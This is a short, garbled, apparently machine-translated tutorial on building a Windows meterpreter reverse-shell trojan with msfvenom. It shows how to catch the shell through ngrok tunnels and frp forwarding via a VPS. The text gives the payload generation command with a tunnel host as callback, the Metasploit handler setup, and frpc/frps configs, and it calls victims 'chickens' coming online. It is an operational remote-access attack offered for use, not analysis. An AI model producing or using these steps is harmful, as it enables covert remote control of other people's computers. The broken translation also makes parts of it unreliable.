adopt ngrok Penetrating rebound shell

0.0 register ngrok Intranet penetration platform account , Open a free Tunnel

website ：https://www.ngrok.cc

eg: 192.168.254.128 My intranet ip

0x01 Download install penetration client client

Address ：https://www.ngrok.cc/sunny/linux_amd64.zip?v=2.1

unzip
   ./sunny  clientid  Tunnel id  

0x02 Msfvenom wood & Ma Geng

kali command Generate EXE Trojan files ：

 msfvenom  -p windows/meterpreter/reverse_tcp LHOST=tcp://free.idcfengye.com LPORT=10206 -f exe -o /home/amingmm/Desktop/puty.exe

0x03 start-up msf To configure Exploit modular

 Use exploit/multi/handler

0x04 Select attack payload to go online

  set payload windows/meterpreter/reverse_tcp

 set
run/exploit

Frp Will the network meterpreter Forward to local msf

https://github.com/fatedier/frp/releases【 download 】

decompression
● kali End frpc To configure

 [common]
server_addr = 121.5.64.200   #vps Address 
server_port = 2580			#vps Listening port 

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 12580		# msf load   Listening port  【 That is, the listening port of the intranet host 】
remote_port = 6666		# vps Traffic forwarding port 【 Flow outlet   Load port 】 

Server side

 [common]
bind_port = 2580  【 Server listening port 】

 ./frps（frpc） -c frps.ini (frpc.ini)   Open server （ client ）

systemctl start frps
systemctl restart frps
systemctl stop frps

● frp Connection process
frps Open two ports to listen ----< Intranet client frpc Turn on tcp Connect to vps
vps– The intranet host establishes a connection Connect 1 establish

● Chicken on line technological process
Load creation process Active connection vps： Load port
Pipeline flow forwarding hold Load port Traffic adopt tcp Connect Contract awarding Transferred to the Intranet kali End

● kali End Online process
kali End frpc client Through pipes Will flow Forward to msf handler --> Listening port